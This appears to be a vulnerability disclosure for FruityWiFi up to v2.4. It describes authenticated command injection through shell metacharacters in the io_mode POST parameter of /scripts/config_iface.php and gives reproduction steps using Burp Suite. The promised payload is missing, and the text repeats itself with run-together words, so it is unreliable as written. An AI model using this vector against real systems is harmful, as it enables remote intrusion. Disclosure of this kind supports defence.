FruityWiFi is a wireless network auditing tool. The application can be installed in any Debian based system (Jessie) adding the extra packages. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq, NetHunter.
During the analysis of the software, it was observed that the fruitywifi <=v2.4 allows a malicious actor to perform a Remote Command Execution. The issues were found on the /scripts/config_iface.php due to improper handling of shell metacharacters which are a part of the "POST" Request. An authentication bad actor can exploit these issues by creating a malicious payload that will contain shell metacharacters in the io_mode of the "POST Request". This issue happens due to missing input validation in the requests which allows execution of the commands.
Steps To Reproduce
1.Log into the application with credentials.
Navigate to the following URL: https://:port/scripts/config_iface.php.
Intercept the request with proxy tools such as Burp Suite and then change request method to POST.
Now, add "io_mode"`" parameter in POST body and insert payload the following payload:
Issue Description
During the analysis of the software, it was observed that the fruitywifi <=v2.4 allows a malicious actor to perform a Remote Command Execution. The issues were found on the
/scripts/config_iface.phpdue to improper handling of shell metacharacters which are a part of the "POST" Request. An authentication bad actor can exploit these issues by creating a malicious payload that will contain shell metacharacters in theio_modeof the "POST Request". This issue happens due to missing input validation in the requests which allows execution of the commands.Steps To Reproduce
1.Log into the application with credentials.